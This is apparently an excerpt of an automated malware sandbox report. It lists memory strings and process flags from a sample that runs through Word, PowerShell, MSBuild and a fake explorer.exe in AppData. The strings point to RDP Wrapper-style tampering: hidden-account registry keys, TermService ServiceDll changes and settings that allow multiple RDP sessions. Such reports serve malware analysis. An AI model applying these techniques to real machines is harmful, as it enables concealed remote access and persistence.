Source: MSBuild.exe, 00000011.00000003.963466175.00000000006A5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
Source: MSBuild.exe, 00000011.00000003.963466175.00000000006A5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: UEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEETermService%ProgramFiles%%windir%\System32%ProgramW6432%\Microsoft DN1\rfxvmt.dll\rdpwrap.ini\sqlmap.dllrudprpdpSOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListSeDebugPrivilegeSYSTEM\CurrentControlSet\Services\TermService\ParametersServiceDllSYSTEM\CurrentControlSet\Services\TermServiceImagePathsvchost.exesvchost.exe -kCertPropSvcSessionEnvServicesActiveSYSTEM\CurrentControlSet\Control\Terminal ServerSYSTEM\CurrentControlSet\Control\Terminal Server\Licensing CoreSOFTWARE\Microsoft\Windows NT\CurrentVersion\WinlogonSYSTEM\CurrentControlSet\Control\Terminal Server\AddInsSYSTEM\CurrentControlSet\ControlTerminal Server\AddIns\Clip RedirectorSYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\Dynamic VCfDenyTSConnectionsEnableConcurrentSessionsAllowMultipleTSSessionsRDPClipNameType
Source: MSBuild.exe, 00000011.00000003.963980442.00000000006B7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
Source: MSBuild.exe, 00000011.00000003.963980442.00000000006B7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: UEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEETermService%ProgramFiles%%windir%\System32%ProgramW6432%\Microsoft DN1\rfxvmt.dll\rdpwrap.ini\sqlmap.dllrudprpdpSOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListSeDebugPrivilegeSYSTEM\CurrentControlSet\Services\TermService\ParametersServiceDllSYSTEM\CurrentControlSet\Services\TermServiceImagePathsvchost.exesvchost.exe -kCertPropSvcSessionEnvServicesActiveSYSTEM\CurrentControlSet\Control\Terminal ServerSYSTEM\CurrentControlSet\Control\Terminal Server\Licensing CoreSOFTWARE\Microsoft\Windows NT\CurrentVersion\WinlogonSYSTEM\CurrentControlSet\Control\Terminal Server\AddInsSYSTEM\CurrentControlSet\ControlTerminal Server\AddIns\Clip RedirectorSYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\Dynamic VCfDenyTSConnectionsEnableConcurrentSessionsAllowMultipleTSSessionsRDPClipNameType
Source: explorer.exe, 00000014.00000002.985267506.000000000289A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
Source: explorer.exe, 00000014.00000002.985267506.000000000289A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: UEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEETermService%ProgramFiles%%windir%\System32%ProgramW6432%\Microsoft DN1\rfxvmt.dll\rdpwrap.ini\sqlmap.dllrudprpdpSOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListSeDebugPrivilegeSYSTEM\CurrentControlSet\Services\TermService\ParametersServiceDllSYSTEM\CurrentControlSet\Services\TermServiceImagePathsvchost.exesvchost.exe -kCertPropSvcSessionEnvServicesActiveSYSTEM\CurrentControlSet\Control\Terminal ServerSYSTEM\CurrentControlSet\Control\Terminal Server\Licensing CoreSOFTWARE\Microsoft\Windows NT\CurrentVersion\WinlogonSYSTEM\CurrentControlSet\Control\Terminal Server\AddInsSYSTEM\CurrentControlSet\ControlTerminal Server\AddIns\Clip RedirectorSYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\Dynamic VCfDenyTSConnectionsEnableConcurrentSessionsAllowMultipleTSSessionsRDPClipNameType
Source: explorer.exe, 0000001D.00000002.1032860739.00000000028B4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
Source: explorer.exe, 0000001D.00000002.1032860739.00000000028B4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: UEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEETermService%ProgramFiles%%windir%\System32%ProgramW6432%\Microsoft DN1\rfxvmt.dll\rdpwrap.ini\sqlmap.dllrudprpdpSOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListSeDebugPrivilegeSYSTEM\CurrentControlSet\Services\TermService\ParametersServiceDllSYSTEM\CurrentControlSet\Services\TermServiceImagePathsvchost.exesvchost.exe -kCertPropSvcSessionEnvServicesActiveSYSTEM\CurrentControlSet\Control\Terminal ServerSYSTEM\CurrentControlSet\Control\Terminal Server\Licensing CoreSOFTWARE\Microsoft\Windows NT\CurrentVersion\WinlogonSYSTEM\CurrentControlSet\Control\Terminal Server\AddInsSYSTEM\CurrentControlSet\ControlTerminal Server\AddIns\Clip RedirectorSYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\Dynamic VCfDenyTSConnectionsEnableConcurrentSessionsAllowMultipleTSSessionsRDPClipNameType

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
